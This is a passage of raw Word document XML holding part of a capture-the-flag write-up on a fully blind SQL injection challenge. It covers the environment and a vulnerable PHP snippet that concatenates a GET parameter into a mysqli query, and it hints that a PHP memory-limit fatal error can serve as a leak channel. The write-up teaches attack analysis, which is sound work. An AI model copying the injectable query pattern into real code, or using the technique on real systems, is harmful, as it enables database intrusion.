          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> line. This is the classic full-blind setup in which data, errors, and timing must all be exfiltrated through side channels.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Two pieces of environmental friction shaped the approach. First, the instance rotated to a fresh subdo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">main roughly every 20 minutes, after which the old host returned HTTP 404; any extraction plan had to survive repeated mid-run migrations. Second, the database account was deliberately low-privileged: no stacked queries, no file read, but a fully readable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a MySQL-compatible backend (MariaDB / MySQL 8 family). The two tables that mattered were </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which fed the visible query, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which held the objective.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2: Environment facts observed during recon</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="single" w:color="c5d8d0" w:sz="1" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Property</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Value observed</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Endpoint</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET https://&lt;instance&gt;.chal.ctf.ae/?id=...</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Stack</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PHP 8 (php-fpm) + mysqli -&gt; DB on 127.0.0.1</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DB account</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">user @ chall - low privilege, no stacked queries, no FILE</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Output</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Constant body - 4,557 bytes with id, 4,534 bytes without</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Instance TTL</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">~20 minutes, then the old subdomain returns 404</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Backend DB</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MySQL-compatible (MariaDB / MySQL 8 family), information_schema readable</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100002" w:name="_Toc100002"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Source Code Analysis: Three Closed Channels</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100002"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">he entire challenge lived in one file, shown in Figure 1 exactly as the live instance served it. Read as a whole, the code is an exercise in closing channels: data output, error output, and timing are the three ways a blind injection can leak information, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and the author addressed each of them deliberately. Understanding precisely why each closure works and where its silent assumption breaks is the key to understanding the solve, so this chapter walks the source line by line before any payload is thrown.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="60" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4762500" cy="401002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4762500" cy="4010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5.00pt;height:315.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId12" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="200" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: The deployed challenge served by the live instance the page self-highlights sample.php on every request.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100003" w:name="_Toc100003"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 The Injection Point and a Deliberately Silent Output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100003"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable lines are unambiguous once seen:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 1: The injection point raw concatenation into query()</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
          <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0e1712"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="200" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$sql = "SELECT username FROM users WHERE id = " . $_GET["id"];</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$res = $db-&gt;query($sql);</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if (!$res) {</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    die("ill try to tell him, dw");</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$row = $res-&gt;fetch_row();</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">echo 'ill try to tell him, dw';</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This is textbook concatenation: anything after </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">is attacker-written SQL appended to the tail of the WHERE clause, which conveniently leaves the syntax open to trailing clauses such as UNION segments. The code beneath it, however, is information-free by design. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">die()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> branch and the success branch emit byte-identical bodies, so there is no boolean split, no error page, no HTML comment, and not even a length difference to key on. The fetched </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">$row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is immediately discarded, which guarantees that result data never reaches the response through any normal path.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Errors are silenced at the driver level as well: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqli_report(MYSQLI_REPORT_OFF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> stops mysqli from throwing exceptions or emitting warnings on failed statements, so a malformed payload produces no diagnostic at all execution simply falls into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">die()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> path. One subtle asymmetry in this design becomes the whole game later: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MYSQLI_REPORT_OFF silences SQL errors, but it does nothing about a PHP fatal error raised outside the driver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, for example one caused by the mysqlnd client library trying to buffer a result set that no longer fits in the PHP memory limit. The author closed the SQL-error door, but the fatal-error door was a different door entirely.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100004" w:name="_Toc100004"/>
      <w:r>
